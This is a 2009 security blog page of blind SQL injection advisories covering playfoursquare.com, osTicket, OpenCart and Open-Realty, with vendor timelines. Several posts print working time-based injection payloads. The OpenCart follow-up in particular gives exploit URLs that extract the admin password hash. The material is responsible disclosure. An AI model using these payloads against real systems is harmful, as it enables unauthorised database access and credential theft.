Posts tagged: blind sqli

Aug 14 2009

Blind SQL Injection in playfoursquare.com

I stumbled upon a fun little sql injection in playfoursquare the other day. I notified them but have not heard back, but it appears it has been addressed so here are the details.

     It was possible to inject specially crafted SQL into the cookie "cookieCityID"
     which provides 

     If you set the cookie to the value below the query will take roughly 5-7
     seconds to return with this "True" condition (1=1).

     (SELECT IF(1=1,BENCHMARK(1000000,SHA1(1)),0))

     If you change the logic condition to 1=0 (False) the query returns
     immediately demonstrating that blind SQL injection is possible.

     (SELECT IF(1=0,BENCHMARK(1000000,SHA1(1)),0))
III. REFERENCES
     [1] - http://playfoursquare.com

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , , ,

Filed in Web Application Security | Adam Baldwin | Comments Off

Jun 26 2009

osTicket Admin Login Blind SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection
   Application: osTicket v1.6 RC4
        Vendor: osTicket
Vendor website: http://www.osticket.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
    "osTicket is a widely-used open source support ticket system. It seamlessly
    integrates inquiries created via email and web-based forms into a simple
    easy to use multi-user web interface. Easily manage, organize and archive
    all your support requests and responses in one place while providing your
    clients with accountability and responsiveness they deserve." [1]

  II. DETAILS
    osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which
    can be abused to execute a blind sql injection attack by an unauthenticated
    attacker.

    The vendor has provided a new release v1.6 RC5 which addresses this vulnerability.
    They have also provided patching instructions [2] should you be unable to perform
    a full upgrade at this time.

    One sample attack string might look similar to the following:
    '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
    FROM ost_staff where staff_id=1) and '1'='1
  III. REFERENCES
    [1] - http://www.osticket.com
    [2] - http://osticket.com/forums/project.php?issueid=118

  IV. VENDOR COMMUNICATION
    3.25.2009 - Vulnerability Discovery
    3.25.2009 - Vendor notification & initial vendor response
    6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , , ,

Filed in Advisories, Web Application Security | Adam Baldwin | Comments Off

May 12 2009

NGENUITY-2009-005 OpenCart re-visited, exploit included

I was recently asked to take down the OpenCart advisory as it was stated the information provided was not verified. I’m of the opinion that just because I was not able to exploit a portion of the advisory that it should still be published. I can not be that ignorant to think that just because I can’t somebody else can’t.

Despite that belief I published only the verifiable details and provided the details on the other “potential” attack vectors to the vendor, who took that to believe that I had not verified any of it. I politely provided evidence that the original advisory was verifiable exploitable and I also provided proof that the other, non-verified piece I provided to them was also exploitable.

Since these vulnerabilities have been fixed a while ago here are a couple examples of working exploits. By measuring the time it takes for a query to execute we can guess letters of the password hash until we know the full value. This can be used to pull out any data from the database that has been granted to the OpenCart application.

Order parameter example:
This statement takes time to execute
http://example.com/index.php?route=product/category&path=18&sort=p.price&order=ASC,(SELECT
IF(SUBSTRING(password,1,1)=CHAR(97),BENCHMARK(100000,SHA1(1)),0)
password FROM user WHERE username=CHAR(97,100,109,105,110))

This statement returns really quickly as the first character is obviously not CHAR(00)
http://example.com/index.php?route=product/category&path=18&sort=p.price&order=ASC,(SELECT
IF(SUBSTRING(password,1,1)=CHAR(00),BENCHMARK(100000,SHA1(1)),0)
password FROM user WHERE username=CHAR(97,100,109,105,110))

Sort parameter example:
The same attack using a different injection point not previously released.
sort parameter blind injection
http://example.com/index.php?route=product/category&path=18&sort=p.price&sort=(SELECT
%20IF(SUBSTRING(password,1,1)=CHAR(97),BENCHMARK(1000000,SHA1(1)),0)%20password
%20FROM%20user%20WHERE%20username=CHAR(97,100,109,105,110))--

Tags: , ,

Filed in Web Application Security | Adam Baldwin | Comments (1)

Mar 10 2009

NGENUITY-2009-005 OpenCart Order By Blind SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-005 - OpenCart Order By Blind SQL Injection
   Application: OpenCart 1.1.8
        Vendor: OpenCart
Vendor website: http://www.opencart.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: 34121

  I. BACKGROUND
     "OpenCart is an open source PHP-based online shopping cart system. A robust e-commerce
     solution for Internet merchants with the ability to create their own online business and
     participate in e-commerce at a minimal cost."[1]

 II. DETAILS
     An SQL Injection vulnerability exists within OpenCart that can be exploited using blind
     injection. This vulnerability exists due to the "order" URL parameter not being properly
     sanitized. 

     This vulnerability can be exploited by an unauthenticated attacker giving them the ability
     to access any data within the OpenCart database. This may include but is not limited to
     Usernames, Unsalted MD5 password hashes, and payment gateway credentials.
III. REFERENCES
     [1] - http://www.opencart.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     3.10.2009 - Vendor Notification
     3.10.2009 - Vendor response stating that this is fixed in version 1.1.9
     3.15.2009 - Version 1.1.9 released.

Copyright (c) 2009 nGenuity Information Services, LLC

Tags: , ,

Filed in Advisories | Adam Baldwin | Comments (1)

Jan 27 2009

NGENUITY-2009-002 – Open-Realty SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-002
   Application: Open-Realty 2.5.5
        Vendor: Transparent Technologies,INC
Vendor website: http://www.transparent-tech.com/
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     "Open-Realty® is an open source web based real estate listing management
application. It is intended to be both easy to setup and use. Written
in PHP, Open-Realty® is designed to be a fast and flexible tool for
your real estate website" [1]

 II. DETAILS
     A Blind SQL Injection vulnerability exists within Open-Realty that is
     exploitable by a user with admin or agent privileges.

     This vulnerability can be exploited by inserting specially crafted SQL
     into the edit form field in the image upload feature of Open-Realty.

     Successful exploitation of this vulnerability could result in extraction
     of data from the Open-Realty database.

III. VENDOR
     1.27.2009 - Version 2.5.6 has been released and addresses this vulnerability.

 VI. REFERENCES
     [1] - http://www.open-realty.org/
Copyright (c) 2008 nGenuity Information Services, LLC

Tags: , , , , ,

Filed in Advisories, Realty, Web Application Security | Adam Baldwin | Comments Off

WordPress Themes